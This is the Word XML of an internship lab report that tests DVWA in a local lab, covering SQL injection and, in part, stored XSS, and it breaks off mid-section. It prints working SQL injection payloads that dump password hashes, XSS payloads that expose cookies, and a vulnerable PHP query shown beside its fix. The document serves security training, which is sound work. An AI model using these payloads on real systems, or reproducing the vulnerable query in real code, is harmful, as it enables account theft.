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145" w:rsidRDefault="00923145">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Web Application Security Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Task 3 — DVWA Vulnerability Assessment (SQLi, XSS, CSRF, File Inclusion, Burp Suite, Security Headers)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cybersecurity &amp; Ethical Hacking Internship Program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ApexPlanet Software Pvt. Ltd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Prepared by: [Purva Nitin Gawade</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Target Application: DVWA (Damn Vulnerable Web Application) — Local Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>3. Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.1 SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.2 Cross-Site S</w:t>
      </w:r>
      <w:r>
        <w:t>cripting (XSS) — Stored</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.3 Cross-Site Scripting (XSS) — Reflected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.4 Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.5 Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.6 Remote File Inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4. Burp Suite Testing Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>5. Web Security Headers Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>6. Summ</w:t>
      </w:r>
      <w:r>
        <w:t>ary of Findings &amp; Risk Ratings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>7. Conclusion &amp; Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This report documents a controlled security assessment performed against DVWA (Damn Vulnerable Web Application), hosted locally in an isolated Kali Linux lab environment, as part of Task 3 (Web Application Security) of the ApexPlanet Cybersecurity &amp; Ethica</w:t>
      </w:r>
      <w:r>
        <w:t>l Hacking Internship Program. The objective of this assessment was to identify, exploit, and validate mitigations for common OWASP Top 10 web application vulnerabilities in a safe, non-production setting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Six vulnerability classes were tested: SQL Injectio</w:t>
      </w:r>
      <w:r>
        <w:t>n, Stored Cross-Site Scripting (XSS), Reflected XSS, Cross-Site Request Forgery (CSRF), Local File Inclusion (LFI), and Remote File Inclusion (RFI). For each vulnerability, the exploit was first demonstrated against DVWA's Low security level, then re-teste</w:t>
      </w:r>
      <w:r>
        <w:t>d against the High security level to confirm that DVWA's built-in mitigations (prepared statements, input validation, Content Security Policy, and CSRF tokens) successfully blocked the same attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additionally, Burp Suite was used to intercept and modify </w:t>
      </w:r>
      <w:r>
        <w:t>a live login request and to automate credential guessing using the Intruder tool, and DVWA's HTTP response headers were assessed and hardened using industry-standard security headers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All findings, evidence, and mitigation confirmations are documented in S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ection 3 onward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker Machine: Kali Linux (VirtualBox/VMware)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Target Application: DVWA, hosted on Apache2 + MariaDB/MySQL + PHP, on the same lab network (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Network: Isolated Host-Only lab network — no interne</w:t>
      </w:r>
      <w:r>
        <w:t>t-facing exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Burp Suite Community Edition — request interception &amp; Intruder fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Firefox Developer Tools — response header inspection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Nano / Bash — payload creation and server configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Python3 HTTP Server — RFI payload hosting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>secur</w:t>
      </w:r>
      <w:r>
        <w:t>ityheaders.com — header benchmarking against a reference site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Approach</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each vulnerability class was tested using a consistent Low-security vs. High-security comparison methodology: the exploit was first performed under DVWA's Low security setting to prove </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the vulnerability exists, then the exact same technique was retried under High security to validate that DVWA's corresponding code-level or header-level mitigation prevents the attack. Source code differences between security levels were reviewed directly </w:t>
      </w:r>
      <w:r>
        <w:t>via DVWA's built-in 'View Source' feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Determine whether the DVWA 'SQL Injection' module is vulnerable to classic and UNION-based SQL injection, and confirm that prepared statements at High security prevent exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Set DVWA Security Level to Low.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Navigated to the SQL Injection module and submitted a normal numeric User ID (1) to confirm baseline behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Injected a boolean-based payload to bypass the query's intended logic and dump all user records.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Used an ORDER BY payload to enumerate the numbe</w:t>
      </w:r>
      <w:r>
        <w:t>r of columns returned by the underlying query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Used a UNION SELECT payload to extract usernames and password hashes directly from the 'users' table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Verified a sample MD5 hash against a known plaintext value to demonstrate crackability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Repeated the same p</w:t>
      </w:r>
      <w:r>
        <w:t>ayloads at High security level to confirm the prepared-statement fix blocks the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload(s) Used</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 OR '1'='1</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 ORDER BY 3-- -</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 UNION SELECT 1,2-- -</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 xml:space="preserve">' UNION SELECT user, password FROM users-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26367356" wp14:editId="11F36178">
            <wp:extent cx="5940787" cy="3013544"/>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QLi Payload Dump All Users.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="1144" b="28010"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5996426" cy="3041767"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQLi — UNION SELECT extracted usernames &amp; password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>An unauthenticated attacker could extract the entire user table, including password hashes, leading to full account compromise, credential reuse attacks, and unauthorized administrative</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation: Prepared Statements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>At High security, DVWA binds the User ID input as a parameter using PDO prepared statements rather than concatenating it into the SQL string. The database engine treats the input strictly as data,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so injected SQL syntax has no effect. Re-running all payloads above against High security returned no data and no errors.</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 Low  (vulnerable): $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";</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 High (fixed): $data = $db-&gt;prepar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e('SELECT first_name, last_name FROM users WHERE user_id = (?) LIMIT 1;'); $data-&gt;bindParam(1, $id, PDO::PARAM_INT);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005167E5" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Cross-Site Scripting (XSS) — Stored</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C2410C"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Determine whether the DVWA 'XSS (Stored)' guestbook module permits persistent script injection that executes for every visitor, and confirm that input validation blocks it at High security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Set DVWA Security Level to Low.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Opened the XSS (Stored) guestbook module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Submitted a message containing an inline &lt;script&gt; payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Reloaded the page and navigated away and back to confirm the payload persists and re-executes on every visit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submitted a document.cookie-based payload to </w:t>
      </w:r>
      <w:r>
        <w:t>demonstrate session-cookie exposure risk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Repeated the same payload at High security to confirm input filtering blocks execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload(s) Used</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&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</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&lt;script&gt;alert(document.cookie)&lt;/sc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163A73A5" wp14:editId="5B732BE0">
            <wp:extent cx="5289550" cy="33909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89550" cy="3390900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stored XSS — alert popup firing on submit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Because the payload is stored server-side, it executes automatically for every user (including administrators) who views the guestbook — enabling session hijacking via cookie theft, defacement, or redirection to malicious si</w:t>
      </w:r>
      <w:r>
        <w:t>tes, without requiring the attacker to send a crafted link to each victim individually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
